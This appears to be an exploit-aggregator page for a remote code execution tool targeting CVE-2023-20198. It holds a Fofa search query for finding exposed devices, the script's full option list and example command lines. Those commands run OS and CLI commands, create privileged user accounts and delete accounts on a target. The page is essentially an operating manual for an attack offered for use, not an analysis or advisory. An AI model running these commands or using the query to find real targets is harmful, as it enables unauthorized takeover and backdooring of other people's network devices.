## https://sploitus.com/exploit?id=0004572D-8F1A-5FA0-B583-57259E099827
# Fofa

```
body="<script>window.onload=function(){ url ='/webui';window.location.href=url;}</script>" && is_honeypot=false && is_fraud=false
```

# Usage

```
usage: CVE-2023-20198-RCE.py [-h] -u URL [-p PROXY] [-au ADD_USER] [-ap ADD_PASS] [-du DEL_USER] [-pm PRIVILEGE_MODE]
                             [-em EXPLOIT_MODE] [-oc OS_CMD] [-cc CLI_CMD]

CVE-2023-20198-RCE

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     target url to check, eg: http://example.com
  -p PROXY, --proxy PROXY
                        proxy url, eg: http://127.0.0.1:8083
  -au ADD_USER, --add-user ADD_USER
                        username to add.If left blank, an 8-digit mixed case English string will be randomly
                        generated.
  -ap ADD_PASS, --add-pass ADD_PASS
                        password to add.If left blank, an 8-digit mixed case English string will be randomly
                        generated.
  -du DEL_USER, --del-user DEL_USER
                        username to delete
  -pm PRIVILEGE_MODE, --privilege-mode PRIVILEGE_MODE
                        user/privileged
  -em EXPLOIT_MODE, --exploit-mode EXPLOIT_MODE
                        user/cmd
  -oc OS_CMD, --os-cmd OS_CMD
                        exec os command
  -cc CLI_CMD, --cli-cmd CLI_CMD
                        exec cli command
```

For example:

```powershell
python CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em cmd -pm privileged -cc "show version"

python CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em cmd -oc "uname -a"

python CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em user -au -ap

python CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em user -au hahahahha -ap hahahahha

python CVE-2023-20198-RCE.py -u http://192.168.1.198 -p http://127.0.0.1:8083 -em user -du aaaaaa
```

![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240425153133359.png)